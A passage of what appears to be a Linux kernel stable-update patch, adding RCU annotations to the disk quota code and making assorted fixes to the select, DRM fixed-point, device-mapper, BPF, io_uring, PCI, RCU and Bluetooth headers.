+-	struct dquot **dquots, *got[MAXQUOTAS] = {};
++	struct dquot __rcu **dquots;
++	struct dquot *got[MAXQUOTAS] = {};
+ 	struct super_block *sb = inode->i_sb;
+ 	qsize_t rsv;
+ 	int ret = 0;
+@@ -1588,7 +1542,7 @@ static int __dquot_initialize(struct inode *inode, int type)
+ 		if (!got[cnt])
+ 			continue;
+ 		if (!dquots[cnt]) {
+-			dquots[cnt] = got[cnt];
++			rcu_assign_pointer(dquots[cnt], got[cnt]);
+ 			got[cnt] = NULL;
+ 			/*
+ 			 * Make quota reservation system happy if someone
+@@ -1596,12 +1550,16 @@ static int __dquot_initialize(struct inode *inode, int type)
+ 			 */
+ 			rsv = inode_get_rsv_space(inode);
+ 			if (unlikely(rsv)) {
++				struct dquot *dquot = srcu_dereference_check(
++					dquots[cnt], &dquot_srcu,
++					lockdep_is_held(&dq_data_lock));
++
+ 				spin_lock(&inode->i_lock);
+ 				/* Get reservation again under proper lock */
+ 				rsv = __inode_get_rsv_space(inode);
+-				spin_lock(&dquots[cnt]->dq_dqb_lock);
+-				dquots[cnt]->dq_dqb.dqb_rsvspace += rsv;
+-				spin_unlock(&dquots[cnt]->dq_dqb_lock);
++				spin_lock(&dquot->dq_dqb_lock);
++				dquot->dq_dqb.dqb_rsvspace += rsv;
++				spin_unlock(&dquot->dq_dqb_lock);
+ 				spin_unlock(&inode->i_lock);
+ 			}
+ 		}
+@@ -1623,7 +1581,7 @@ EXPORT_SYMBOL(dquot_initialize);
+ 
+ bool dquot_initialize_needed(struct inode *inode)
+ {
+-	struct dquot **dquots;
++	struct dquot __rcu **dquots;
+ 	int i;
+ 
+ 	if (!inode_quota_active(inode))
+@@ -1648,13 +1606,14 @@ EXPORT_SYMBOL(dquot_initialize_needed);
+ static void __dquot_drop(struct inode *inode)
+ {
+ 	int cnt;
+-	struct dquot **dquots = i_dquot(inode);
++	struct dquot __rcu **dquots = i_dquot(inode);
+ 	struct dquot *put[MAXQUOTAS];
+ 
+ 	spin_lock(&dq_data_lock);
+ 	for (cnt = 0; cnt < MAXQUOTAS; cnt++) {
+-		put[cnt] = dquots[cnt];
+-		dquots[cnt] = NULL;
++		put[cnt] = srcu_dereference_check(dquots[cnt], &dquot_srcu,
++					lockdep_is_held(&dq_data_lock));
++		rcu_assign_pointer(dquots[cnt], NULL);
+ 	}
+ 	spin_unlock(&dq_data_lock);
+ 	dqput_all(put);
+@@ -1662,7 +1621,7 @@ static void __dquot_drop(struct inode *inode)
+ 
+ void dquot_drop(struct inode *inode)
+ {
+-	struct dquot * const *dquots;
++	struct dquot __rcu * const *dquots;
+ 	int cnt;
+ 
+ 	if (IS_NOQUOTA(inode))
+@@ -1735,7 +1694,8 @@ int __dquot_alloc_space(struct inode *inode, qsize_t number, int flags)
+ 	int cnt, ret = 0, index;
+ 	struct dquot_warn warn[MAXQUOTAS];
+ 	int reserve = flags & DQUOT_SPACE_RESERVE;
+-	struct dquot **dquots;
++	struct dquot __rcu **dquots;
++	struct dquot *dquot;
+ 
+ 	if (!inode_quota_active(inode)) {
+ 		if (reserve) {
+@@ -1755,27 +1715,26 @@ int __dquot_alloc_space(struct inode *inode, qsize_t number, int flags)
+ 	index = srcu_read_lock(&dquot_srcu);
+ 	spin_lock(&inode->i_lock);
+ 	for (cnt = 0; cnt < MAXQUOTAS; cnt++) {
+-		if (!dquots[cnt])
++		dquot = srcu_dereference(dquots[cnt], &dquot_srcu);
++		if (!dquot)
+ 			continue;
+ 		if (reserve) {
+-			ret = dquot_add_space(dquots[cnt], 0, number, flags,
+-					      &warn[cnt]);
++			ret = dquot_add_space(dquot, 0, number, flags, &warn[cnt]);
+ 		} else {
+-			ret = dquot_add_space(dquots[cnt], number, 0, flags,
+-					      &warn[cnt]);
++			ret = dquot_add_space(dquot, number, 0, flags, &warn[cnt]);
+ 		}
+ 		if (ret) {
+ 			/* Back out changes we already did */
+ 			for (cnt--; cnt >= 0; cnt--) {
+-				if (!dquots[cnt])
++				dquot = srcu_dereference(dquots[cnt], &dquot_srcu);
++				if (!dquot)
+ 					continue;
+-				spin_lock(&dquots[cnt]->dq_dqb_lock);
++				spin_lock(&dquot->dq_dqb_lock);
+ 				if (reserve)
+-					dquot_free_reserved_space(dquots[cnt],
+-								  number);
++					dquot_free_reserved_space(dquot, number);
+ 				else
+-					dquot_decr_space(dquots[cnt], number);
+-				spin_unlock(&dquots[cnt]->dq_dqb_lock);
++					dquot_decr_space(dquot, number);
++				spin_unlock(&dquot->dq_dqb_lock);
+ 			}
+ 			spin_unlock(&inode->i_lock);
+ 			goto out_flush_warn;
+@@ -1805,7 +1764,8 @@ int dquot_alloc_inode(struct inode *inode)
+ {
+ 	int cnt, ret = 0, index;
+ 	struct dquot_warn warn[MAXQUOTAS];
+-	struct dquot * const *dquots;
++	struct dquot __rcu * const *dquots;
++	struct dquot *dquot;
+ 
+ 	if (!inode_quota_active(inode))
+ 		return 0;
+@@ -1816,17 +1776,19 @@ int dquot_alloc_inode(struct inode *inode)
+ 	index = srcu_read_lock(&dquot_srcu);
+ 	spin_lock(&inode->i_lock);
+ 	for (cnt = 0; cnt < MAXQUOTAS; cnt++) {
+-		if (!dquots[cnt])
++		dquot = srcu_dereference(dquots[cnt], &dquot_srcu);
++		if (!dquot)
+ 			continue;
+-		ret = dquot_add_inodes(dquots[cnt], 1, &warn[cnt]);
++		ret = dquot_add_inodes(dquot, 1, &warn[cnt]);
+ 		if (ret) {
+ 			for (cnt--; cnt >= 0; cnt--) {
+-				if (!dquots[cnt])
++				dquot = srcu_dereference(dquots[cnt], &dquot_srcu);
++				if (!dquot)
+ 					continue;
+ 				/* Back out changes we already did */
+-				spin_lock(&dquots[cnt]->dq_dqb_lock);
+-				dquot_decr_inodes(dquots[cnt], 1);
+-				spin_unlock(&dquots[cnt]->dq_dqb_lock);
++				spin_lock(&dquot->dq_dqb_lock);
++				dquot_decr_inodes(dquot, 1);
++				spin_unlock(&dquot->dq_dqb_lock);
+ 			}
+ 			goto warn_put_all;
+ 		}
+@@ -1847,7 +1809,8 @@ EXPORT_SYMBOL(dquot_alloc_inode);
+  */
+ int dquot_claim_space_nodirty(struct inode *inode, qsize_t number)
+ {
+-	struct dquot **dquots;
++	struct dquot __rcu **dquots;
++	struct dquot *dquot;
+ 	int cnt, index;
+ 
+ 	if (!inode_quota_active(inode)) {
+@@ -1863,9 +1826,8 @@ int dquot_claim_space_nodirty(struct inode *inode, qsize_t number)
+ 	spin_lock(&inode->i_lock);
+ 	/* Claim reserved quotas to allocated quotas */
+ 	for (cnt = 0; cnt < MAXQUOTAS; cnt++) {
+-		if (dquots[cnt]) {
+-			struct dquot *dquot = dquots[cnt];
+-
++		dquot = srcu_dereference(dquots[cnt], &dquot_srcu);
++		if (dquot) {
+ 			spin_lock(&dquot->dq_dqb_lock);
+ 			if (WARN_ON_ONCE(dquot->dq_dqb.dqb_rsvspace < number))
+ 				number = dquot->dq_dqb.dqb_rsvspace;
+@@ -1889,7 +1851,8 @@ EXPORT_SYMBOL(dquot_claim_space_nodirty);
+  */
+ void dquot_reclaim_space_nodirty(struct inode *inode, qsize_t number)
+ {
+-	struct dquot **dquots;
++	struct dquot __rcu **dquots;
++	struct dquot *dquot;
+ 	int cnt, index;
+ 
+ 	if (!inode_quota_active(inode)) {
+@@ -1905,9 +1868,8 @@ void dquot_reclaim_space_nodirty(struct inode *inode, qsize_t number)
+ 	spin_lock(&inode->i_lock);
+ 	/* Claim reserved quotas to allocated quotas */
+ 	for (cnt = 0; cnt < MAXQUOTAS; cnt++) {
+-		if (dquots[cnt]) {
+-			struct dquot *dquot = dquots[cnt];
+-
++		dquot = srcu_dereference(dquots[cnt], &dquot_srcu);
++		if (dquot) {
+ 			spin_lock(&dquot->dq_dqb_lock);
+ 			if (WARN_ON_ONCE(dquot->dq_dqb.dqb_curspace < number))
+ 				number = dquot->dq_dqb.dqb_curspace;
+@@ -1933,7 +1895,8 @@ void __dquot_free_space(struct inode *inode, qsize_t number, int flags)
+ {
+ 	unsigned int cnt;
+ 	struct dquot_warn warn[MAXQUOTAS];
+-	struct dquot **dquots;
++	struct dquot __rcu **dquots;
++	struct dquot *dquot;
+ 	int reserve = flags & DQUOT_SPACE_RESERVE, index;
+ 
+ 	if (!inode_quota_active(inode)) {
+@@ -1954,17 +1917,18 @@ void __dquot_free_space(struct inode *inode, qsize_t number, int flags)
+ 		int wtype;
+ 
+ 		warn[cnt].w_type = QUOTA_NL_NOWARN;
+-		if (!dquots[cnt])
++		dquot = srcu_dereference(dquots[cnt], &dquot_srcu);
++		if (!dquot)
+ 			continue;
+-		spin_lock(&dquots[cnt]->dq_dqb_lock);
+-		wtype = info_bdq_free(dquots[cnt], number);
++		spin_lock(&dquot->dq_dqb_lock);
++		wtype = info_bdq_free(dquot, number);
+ 		if (wtype != QUOTA_NL_NOWARN)
+-			prepare_warning(&warn[cnt], dquots[cnt], wtype);
++			prepare_warning(&warn[cnt], dquot, wtype);
+ 		if (reserve)
+-			dquot_free_reserved_space(dquots[cnt], number);
++			dquot_free_reserved_space(dquot, number);
+ 		else
+-			dquot_decr_space(dquots[cnt], number);
+-		spin_unlock(&dquots[cnt]->dq_dqb_lock);
++			dquot_decr_space(dquot, number);
++		spin_unlock(&dquot->dq_dqb_lock);
+ 	}
+ 	if (reserve)
+ 		*inode_reserved_space(inode) -= number;
+@@ -1988,7 +1952,8 @@ void dquot_free_inode(struct inode *inode)
+ {
+ 	unsigned int cnt;
+ 	struct dquot_warn warn[MAXQUOTAS];
+-	struct dquot * const *dquots;
++	struct dquot __rcu * const *dquots;
++	struct dquot *dquot;
+ 	int index;
+ 
+ 	if (!inode_quota_active(inode))
+@@ -1999,16 +1964,16 @@ void dquot_free_inode(struct inode *inode)
+ 	spin_lock(&inode->i_lock);
+ 	for (cnt = 0; cnt < MAXQUOTAS; cnt++) {
+ 		int wtype;
+-
+ 		warn[cnt].w_type = QUOTA_NL_NOWARN;
+-		if (!dquots[cnt])
++		dquot = srcu_dereference(dquots[cnt], &dquot_srcu);
++		if (!dquot)
+ 			continue;
+-		spin_lock(&dquots[cnt]->dq_dqb_lock);
+-		wtype = info_idq_free(dquots[cnt], 1);
++		spin_lock(&dquot->dq_dqb_lock);
++		wtype = info_idq_free(dquot, 1);
+ 		if (wtype != QUOTA_NL_NOWARN)
+-			prepare_warning(&warn[cnt], dquots[cnt], wtype);
+-		dquot_decr_inodes(dquots[cnt], 1);
+-		spin_unlock(&dquots[cnt]->dq_dqb_lock);
++			prepare_warning(&warn[cnt], dquot, wtype);
++		dquot_decr_inodes(dquot, 1);
++		spin_unlock(&dquot->dq_dqb_lock);
+ 	}
+ 	spin_unlock(&inode->i_lock);
+ 	mark_all_dquot_dirty(dquots);
+@@ -2034,8 +1999,9 @@ int __dquot_transfer(struct inode *inode, struct dquot **transfer_to)
+ 	qsize_t cur_space;
+ 	qsize_t rsv_space = 0;
+ 	qsize_t inode_usage = 1;
++	struct dquot __rcu **dquots;
+ 	struct dquot *transfer_from[MAXQUOTAS] = {};
+-	int cnt, ret = 0;
++	int cnt, index, ret = 0;
+ 	char is_valid[MAXQUOTAS] = {};
+ 	struct dquot_warn warn_to[MAXQUOTAS];
+ 	struct dquot_warn warn_from_inodes[MAXQUOTAS];
+@@ -2066,6 +2032,7 @@ int __dquot_transfer(struct inode *inode, struct dquot **transfer_to)
+ 	}
+ 	cur_space = __inode_get_bytes(inode);
+ 	rsv_space = __inode_get_rsv_space(inode);
++	dquots = i_dquot(inode);
+ 	/*
+ 	 * Build the transfer_from list, check limits, and update usage in
+ 	 * the target structures.
+@@ -2080,7 +2047,8 @@ int __dquot_transfer(struct inode *inode, struct dquot **transfer_to)
+ 		if (!sb_has_quota_active(inode->i_sb, cnt))
+ 			continue;
+ 		is_valid[cnt] = 1;
+-		transfer_from[cnt] = i_dquot(inode)[cnt];
++		transfer_from[cnt] = srcu_dereference_check(dquots[cnt],
++				&dquot_srcu, lockdep_is_held(&dq_data_lock));
+ 		ret = dquot_add_inodes(transfer_to[cnt], inode_usage,
+ 				       &warn_to[cnt]);
+ 		if (ret)
+@@ -2119,13 +2087,21 @@ int __dquot_transfer(struct inode *inode, struct dquot **transfer_to)
+ 						  rsv_space);
+ 			spin_unlock(&transfer_from[cnt]->dq_dqb_lock);
+ 		}
+-		i_dquot(inode)[cnt] = transfer_to[cnt];
++		rcu_assign_pointer(dquots[cnt], transfer_to[cnt]);
+ 	}
+ 	spin_unlock(&inode->i_lock);
+ 	spin_unlock(&dq_data_lock);
+ 
+-	mark_all_dquot_dirty(transfer_from);
+-	mark_all_dquot_dirty(transfer_to);
++	/*
++	 * These arrays are local and we hold dquot references so we don't need
++	 * the srcu protection but still take dquot_srcu to avoid warning in
++	 * mark_all_dquot_dirty().
++	 */
++	index = srcu_read_lock(&dquot_srcu);
++	mark_all_dquot_dirty((struct dquot __rcu **)transfer_from);
++	mark_all_dquot_dirty((struct dquot __rcu **)transfer_to);
++	srcu_read_unlock(&dquot_srcu, index);
++
+ 	flush_warnings(warn_to);
+ 	flush_warnings(warn_from_inodes);
+ 	flush_warnings(warn_from_space);
+diff --git a/fs/select.c b/fs/select.c
+index 0ee55af1a55c2..d4d881d439dcd 100644
+--- a/fs/select.c
++++ b/fs/select.c
+@@ -476,7 +476,7 @@ static inline void wait_key_set(poll_table *wait, unsigned long in,
+ 		wait->_key |= POLLOUT_SET;
+ }
+ 
+-static int do_select(int n, fd_set_bits *fds, struct timespec64 *end_time)
++static noinline_for_stack int do_select(int n, fd_set_bits *fds, struct timespec64 *end_time)
+ {
+ 	ktime_t expire, *to = NULL;
+ 	struct poll_wqueues table;
+diff --git a/include/drm/drm_fixed.h b/include/drm/drm_fixed.h
+index 03cb890690e83..a476a406e5997 100644
+--- a/include/drm/drm_fixed.h
++++ b/include/drm/drm_fixed.h
+@@ -70,7 +70,6 @@ static inline u32 dfixed_div(fixed20_12 A, fixed20_12 B)
+ }
+ 
+ #define DRM_FIXED_POINT		32
+-#define DRM_FIXED_POINT_HALF	16
+ #define DRM_FIXED_ONE		(1ULL << DRM_FIXED_POINT)
+ #define DRM_FIXED_DECIMAL_MASK	(DRM_FIXED_ONE - 1)
+ #define DRM_FIXED_DIGITS_MASK	(~DRM_FIXED_DECIMAL_MASK)
+@@ -89,12 +88,12 @@ static inline int drm_fixp2int(s64 a)
+ 
+ static inline int drm_fixp2int_round(s64 a)
+ {
+-	return drm_fixp2int(a + (1 << (DRM_FIXED_POINT_HALF - 1)));
++	return drm_fixp2int(a + DRM_FIXED_ONE / 2);
+ }
+ 
+ static inline int drm_fixp2int_ceil(s64 a)
+ {
+-	if (a > 0)
++	if (a >= 0)
+ 		return drm_fixp2int(a + DRM_FIXED_ALMOST_ONE);
+ 	else
+ 		return drm_fixp2int(a - DRM_FIXED_ALMOST_ONE);
+diff --git a/include/dt-bindings/clock/r8a779g0-cpg-mssr.h b/include/dt-bindings/clock/r8a779g0-cpg-mssr.h
+index 754c54a6eb06a..7850cdc62e285 100644
+--- a/include/dt-bindings/clock/r8a779g0-cpg-mssr.h
++++ b/include/dt-bindings/clock/r8a779g0-cpg-mssr.h
+@@ -86,5 +86,6 @@
+ #define R8A779G0_CLK_CPEX		74
+ #define R8A779G0_CLK_CBFUSA		75
+ #define R8A779G0_CLK_R			76
++#define R8A779G0_CLK_CP			77
+ 
+ #endif /* __DT_BINDINGS_CLOCK_R8A779G0_CPG_MSSR_H__ */
+diff --git a/include/linux/dm-io.h b/include/linux/dm-io.h
+index 92e7abfe04f92..70b3737052dd2 100644
+--- a/include/linux/dm-io.h
++++ b/include/linux/dm-io.h
+@@ -79,7 +79,8 @@ void dm_io_client_destroy(struct dm_io_client *client);
+  * error occurred doing io to the corresponding region.
+  */
+ int dm_io(struct dm_io_request *io_req, unsigned int num_regions,
+-	  struct dm_io_region *region, unsigned int long *sync_error_bits);
++	  struct dm_io_region *region, unsigned int long *sync_error_bits,
++	  unsigned short ioprio);
+ 
+ #endif	/* __KERNEL__ */
+ #endif	/* _LINUX_DM_IO_H */
+diff --git a/include/linux/exportfs.h b/include/linux/exportfs.h
+index fe848901fcc3a..218fc5c54e901 100644
+--- a/include/linux/exportfs.h
++++ b/include/linux/exportfs.h
+@@ -221,6 +221,7 @@ struct export_operations {
+ #define EXPORT_OP_NOATOMIC_ATTR		(0x10) /* Filesystem cannot supply
+ 						  atomic attribute updates
+ 						*/
++#define EXPORT_OP_FLUSH_ON_CLOSE	(0x20) /* fs flushes file data on close */
+ 	unsigned long	flags;
+ };
+ 
+diff --git a/include/linux/filter.h b/include/linux/filter.h
+index efc42a6e3aed0..face590b24e17 100644
+--- a/include/linux/filter.h
++++ b/include/linux/filter.h
+@@ -495,24 +495,27 @@ static inline bool insn_is_zext(const struct bpf_insn *insn)
+ 	__BPF_MAP(n, __BPF_DECL_ARGS, __BPF_N, u64, __ur_1, u64, __ur_2,       \
+ 		  u64, __ur_3, u64, __ur_4, u64, __ur_5)
+ 
+-#define BPF_CALL_x(x, name, ...)					       \
++#define BPF_CALL_x(x, attr, name, ...)					       \
+ 	static __always_inline						       \
+ 	u64 ____##name(__BPF_MAP(x, __BPF_DECL_ARGS, __BPF_V, __VA_ARGS__));   \
+ 	typedef u64 (*btf_##name)(__BPF_MAP(x, __BPF_DECL_ARGS, __BPF_V, __VA_ARGS__)); \
+-	u64 name(__BPF_REG(x, __BPF_DECL_REGS, __BPF_N, __VA_ARGS__));	       \
+-	u64 name(__BPF_REG(x, __BPF_DECL_REGS, __BPF_N, __VA_ARGS__))	       \
++	attr u64 name(__BPF_REG(x, __BPF_DECL_REGS, __BPF_N, __VA_ARGS__));    \
++	attr u64 name(__BPF_REG(x, __BPF_DECL_REGS, __BPF_N, __VA_ARGS__))     \
+ 	{								       \
+ 		return ((btf_##name)____##name)(__BPF_MAP(x,__BPF_CAST,__BPF_N,__VA_ARGS__));\
+ 	}								       \
+ 	static __always_inline						       \
+ 	u64 ____##name(__BPF_MAP(x, __BPF_DECL_ARGS, __BPF_V, __VA_ARGS__))
+ 
+-#define BPF_CALL_0(name, ...)	BPF_CALL_x(0, name, __VA_ARGS__)
+-#define BPF_CALL_1(name, ...)	BPF_CALL_x(1, name, __VA_ARGS__)
+-#define BPF_CALL_2(name, ...)	BPF_CALL_x(2, name, __VA_ARGS__)
+-#define BPF_CALL_3(name, ...)	BPF_CALL_x(3, name, __VA_ARGS__)
+-#define BPF_CALL_4(name, ...)	BPF_CALL_x(4, name, __VA_ARGS__)
+-#define BPF_CALL_5(name, ...)	BPF_CALL_x(5, name, __VA_ARGS__)
++#define __NOATTR
++#define BPF_CALL_0(name, ...)	BPF_CALL_x(0, __NOATTR, name, __VA_ARGS__)
++#define BPF_CALL_1(name, ...)	BPF_CALL_x(1, __NOATTR, name, __VA_ARGS__)
++#define BPF_CALL_2(name, ...)	BPF_CALL_x(2, __NOATTR, name, __VA_ARGS__)
++#define BPF_CALL_3(name, ...)	BPF_CALL_x(3, __NOATTR, name, __VA_ARGS__)
++#define BPF_CALL_4(name, ...)	BPF_CALL_x(4, __NOATTR, name, __VA_ARGS__)
++#define BPF_CALL_5(name, ...)	BPF_CALL_x(5, __NOATTR, name, __VA_ARGS__)
++
++#define NOTRACE_BPF_CALL_1(name, ...)	BPF_CALL_x(1, notrace, name, __VA_ARGS__)
+ 
+ #define bpf_ctx_range(TYPE, MEMBER)						\
+ 	offsetof(TYPE, MEMBER) ... offsetofend(TYPE, MEMBER) - 1
+diff --git a/include/linux/io_uring.h b/include/linux/io_uring.h
+index a1484cdb3158e..a8f3058448eaa 100644
+--- a/include/linux/io_uring.h
++++ b/include/linux/io_uring.h
+@@ -42,11 +42,11 @@ void io_uring_cmd_done(struct io_uring_cmd *cmd, ssize_t ret, ssize_t res2,
+ 			unsigned issue_flags);
+ void io_uring_cmd_complete_in_task(struct io_uring_cmd *ioucmd,
+ 			void (*task_work_cb)(struct io_uring_cmd *, unsigned));
+-struct sock *io_uring_get_socket(struct file *file);
+ void __io_uring_cancel(bool cancel_all);
+ void __io_uring_free(struct task_struct *tsk);
+ void io_uring_unreg_ringfd(void);
+ const char *io_uring_get_opcode(u8 opcode);
++bool io_is_uring_fops(struct file *file);
+ 
+ static inline void io_uring_files_cancel(void)
+ {
+@@ -71,6 +71,10 @@ static inline int io_uring_cmd_import_fixed(u64 ubuf, unsigned long len, int rw,
+ {
+ 	return -EOPNOTSUPP;
+ }
++static inline bool io_is_uring_fops(struct file *file)
++{
++	return false;
++}
+ static inline void io_uring_cmd_done(struct io_uring_cmd *cmd, ssize_t ret,
+ 		ssize_t ret2, unsigned issue_flags)
+ {
+@@ -79,10 +83,6 @@ static inline void io_uring_cmd_complete_in_task(struct io_uring_cmd *ioucmd,
+ 			void (*task_work_cb)(struct io_uring_cmd *, unsigned))
+ {
+ }
+-static inline struct sock *io_uring_get_socket(struct file *file)
+-{
+-	return NULL;
+-}
+ static inline void io_uring_task_cancel(void)
+ {
+ }
+diff --git a/include/linux/io_uring_types.h b/include/linux/io_uring_types.h
+index f5b687a787a34..37aeea266ebb3 100644
+--- a/include/linux/io_uring_types.h
++++ b/include/linux/io_uring_types.h
+@@ -330,9 +330,6 @@ struct io_ring_ctx {
+ 
+ 	struct list_head		io_buffers_pages;
+ 
+-	#if defined(CONFIG_UNIX)
+-		struct socket		*ring_sock;
+-	#endif
+ 	/* hashed buffered write serialization */
+ 	struct io_wq_hash		*hash_map;
+ 
+diff --git a/include/linux/mlx5/qp.h b/include/linux/mlx5/qp.h
+index 4657d5c54abef..ca0eee571ad7b 100644
+--- a/include/linux/mlx5/qp.h
++++ b/include/linux/mlx5/qp.h
+@@ -269,7 +269,10 @@ struct mlx5_wqe_eth_seg {
+ 	union {
+ 		struct {
+ 			__be16 sz;
+-			u8     start[2];
++			union {
++				u8     start[2];
++				DECLARE_FLEX_ARRAY(u8, data);
++			};
+ 		} inline_hdr;
+ 		struct {
+ 			__be16 type;
+diff --git a/include/linux/moduleloader.h b/include/linux/moduleloader.h
+index 1322652a9d0d9..7dc186ec52a29 100644
+--- a/include/linux/moduleloader.h
++++ b/include/linux/moduleloader.h
+@@ -95,6 +95,14 @@ int module_finalize(const Elf_Ehdr *hdr,
+ 		    const Elf_Shdr *sechdrs,
+ 		    struct module *mod);
+ 
++#ifdef CONFIG_MODULES
++void flush_module_init_free_work(void);
++#else
++static inline void flush_module_init_free_work(void)
++{
++}
++#endif
++
+ /* Any cleanup needed when module leaves. */
+ void module_arch_cleanup(struct module *mod);
+ 
+diff --git a/include/linux/pci.h b/include/linux/pci.h
+index eccaf1abea79d..f5d89a4b811f1 100644
+--- a/include/linux/pci.h
++++ b/include/linux/pci.h
+@@ -2355,6 +2355,11 @@ static inline struct pci_dev *pcie_find_root_port(struct pci_dev *dev)
+ 	return NULL;
+ }
+ 
++static inline bool pci_dev_is_disconnected(const struct pci_dev *dev)
++{
++	return dev->error_state == pci_channel_io_perm_failure;
++}
++
+ void pci_request_acs(void);
+ bool pci_acs_enabled(struct pci_dev *pdev, u16 acs_flags);
+ bool pci_acs_path_enabled(struct pci_dev *start,
+diff --git a/include/linux/poll.h b/include/linux/poll.h
+index a9e0e1c2d1f2f..d1ea4f3714a84 100644
+--- a/include/linux/poll.h
++++ b/include/linux/poll.h
+@@ -14,11 +14,7 @@
+ 
+ /* ~832 bytes of stack space used max in sys_select/sys_poll before allocating
+    additional memory. */
+-#ifdef __clang__
+-#define MAX_STACK_ALLOC 768
+-#else
+ #define MAX_STACK_ALLOC 832
+-#endif
+ #define FRONTEND_STACK_ALLOC	256
+ #define SELECT_STACK_ALLOC	FRONTEND_STACK_ALLOC
+ #define POLL_STACK_ALLOC	FRONTEND_STACK_ALLOC
+diff --git a/include/linux/rcupdate.h b/include/linux/rcupdate.h
+index d2507168b9c7b..319698087d66a 100644
+--- a/include/linux/rcupdate.h
++++ b/include/linux/rcupdate.h
+@@ -268,6 +268,37 @@ do { \
+ 	cond_resched(); \
+ } while (0)
+ 
++/**
++ * rcu_softirq_qs_periodic - Report RCU and RCU-Tasks quiescent states
++ * @old_ts: jiffies at start of processing.
++ *
++ * This helper is for long-running softirq handlers, such as NAPI threads in
++ * networking. The caller should initialize the variable passed in as @old_ts
++ * at the beginning of the softirq handler. When invoked frequently, this macro
++ * will invoke rcu_softirq_qs() every 100 milliseconds thereafter, which will
++ * provide both RCU and RCU-Tasks quiescent states. Note that this macro
++ * modifies its old_ts argument.
++ *
++ * Because regions of code that have disabled softirq act as RCU read-side
++ * critical sections, this macro should be invoked with softirq (and
++ * preemption) enabled.
++ *
++ * The macro is not needed when CONFIG_PREEMPT_RT is defined. RT kernels would
++ * have more chance to invoke schedule() calls and provide necessary quiescent
++ * states. As a contrast, calling cond_resched() only won't achieve the same
++ * effect because cond_resched() does not provide RCU-Tasks quiescent states.
++ */
++#define rcu_softirq_qs_periodic(old_ts) \
++do { \
++	if (!IS_ENABLED(CONFIG_PREEMPT_RT) && \
++	    time_after(jiffies, (old_ts) + HZ / 10)) { \
++		preempt_disable(); \
++		rcu_softirq_qs(); \
++		preempt_enable(); \
++		(old_ts) = jiffies; \
++	} \
++} while (0)
++
+ /*
+  * Infrastructure to implement the synchronize_() primitives in
+  * TREE_RCU and rcu_barrier_() primitives in TINY_RCU.
+diff --git a/include/net/bluetooth/hci.h b/include/net/bluetooth/hci.h
+index a674221d151db..c69e09909449f 100644
+--- a/include/net/bluetooth/hci.h
++++ b/include/net/bluetooth/hci.h
+@@ -416,7 +416,6 @@ enum {
+ #define HCI_NCMD_TIMEOUT	msecs_to_jiffies(4000)	/* 4 seconds */
+ #define HCI_ACL_TX_TIMEOUT	msecs_to_jiffies(45000)	/* 45 seconds */
+ #define HCI_AUTO_OFF_TIMEOUT	msecs_to_jiffies(2000)	/* 2 seconds */
+-#define HCI_POWER_OFF_TIMEOUT	msecs_to_jiffies(5000)	/* 5 seconds */
+ #define HCI_LE_CONN_TIMEOUT	msecs_to_jiffies(20000)	/* 20 seconds */
+ #define HCI_LE_AUTOCONN_TIMEOUT	msecs_to_jiffies(4000)	/* 4 seconds */
+ 
+diff --git a/include/net/bluetooth/hci_core.h b/include/net/bluetooth/hci_core.h
+index 09c978f3d95dc..c50a41f1782a4 100644
+--- a/include/net/bluetooth/hci_core.h
++++ b/include/net/bluetooth/hci_core.h
+@@ -81,7 +81,7 @@ struct discovery_state {
+ 	u8			last_adv_addr_type;
+ 	s8			last_adv_rssi;
+ 	u32			last_adv_flags;
+-	u8			last_adv_data[HCI_MAX_AD_LENGTH];
++	u8			last_adv_data[HCI_MAX_EXT_AD_LENGTH];
+ 	u8			last_adv_data_len;
+ 	bool			report_invalid_rssi;
+ 	bool			result_filtering;
+@@ -293,7 +293,7 @@ struct adv_pattern {
+ 	__u8 ad_type;
+ 	__u8 offset;
+ 	__u8 length;
+-	__u8 value[HCI_MAX_AD_LENGTH];
++	__u8 value[HCI_MAX_EXT_AD_LENGTH];
+ };
+ 
+ struct adv_rssi_thresholds {
+@@ -549,6 +549,7 @@ struct hci_dev {
+ 	__u32			req_status;
+ 	__u32			req_result;
+ 	struct sk_buff		*req_skb;
++	struct sk_buff		*req_rsp;
+ 
+ 	void			*smp_data;
+ 	void			*smp_bredr_data;
+@@ -726,7 +727,7 @@ struct hci_conn {
+ 	__u16		le_conn_interval;
+ 	__u16		le_conn_latency;
+ 	__u16		le_supv_timeout;
+-	__u8		le_adv_data[HCI_MAX_AD_LENGTH];
++	__u8		le_adv_data[HCI_MAX_EXT_AD_LENGTH];
+ 	__u8		le_adv_data_len;
+ 	__u8		le_per_adv_data[HCI_MAX_PER_AD_LENGTH];
+ 	__u8		le_per_adv_data_len;
+@@ -739,6 +740,7 @@ struct hci_conn {
+ 	unsigned long	flags;
+ 
+ 	enum conn_reasons conn_reason;
++	__u8		abort_reason;
+ 
+ 	__u32		clock;
+ 	__u16		clock_accuracy;
+@@ -758,7 +760,6 @@ struct hci_conn {
+ 	struct delayed_work auto_accept_work;
+ 	struct delayed_work idle_work;
+ 	struct delayed_work le_conn_timeout;
+-	struct work_struct  le_scan_cleanup;
+ 
+ 	struct device	dev;
+ 	struct dentry	*debugfs;
+@@ -1709,6 +1710,10 @@ void hci_conn_del_sysfs(struct hci_conn *conn);
+ /* Extended advertising support */
+ #define ext_adv_capable(dev) (((dev)->le_features[1] & HCI_LE_EXT_ADV))
+ 
++/* Maximum advertising length */
++#define max_adv_len(dev) \
++	(ext_adv_capable(dev) ? HCI_MAX_EXT_AD_LENGTH : HCI_MAX_AD_LENGTH)
++
+ /* BLUETOOTH CORE SPECIFICATION Version 5.3 | Vol 4, Part E page 1789:
+  *
+  * C24: Mandatory if the LE Controller supports Connection State and either
+diff --git a/include/net/bluetooth/hci_sync.h b/include/net/bluetooth/hci_sync.h
+index 17f5a4c32f36e..59d15b1a978ab 100644
+--- a/include/net/bluetooth/hci_sync.h
++++ b/include/net/bluetooth/hci_sync.h
+@@ -39,8 +39,10 @@ int __hci_cmd_sync_status_sk(struct hci_dev *hdev, u16 opcode, u32 plen,
+ void hci_cmd_sync_init(struct hci_dev *hdev);
+ void hci_cmd_sync_clear(struct hci_dev *hdev);
+ void hci_cmd_sync_cancel(struct hci_dev *hdev, int err);
+-void __hci_cmd_sync_cancel(struct hci_dev *hdev, int err);
++void hci_cmd_sync_cancel_sync(struct hci_dev *hdev, int err);
+ 
++int hci_cmd_sync_submit(struct hci_dev *hdev, hci_cmd_sync_work_func_t func,
++			void *data, hci_cmd_sync_work_destroy_t destroy);
+ int hci_cmd_sync_queue(struct hci_dev *hdev, hci_cmd_sync_work_func_t func,
+ 		       void *data, hci_cmd_sync_work_destroy_t destroy);
+ 
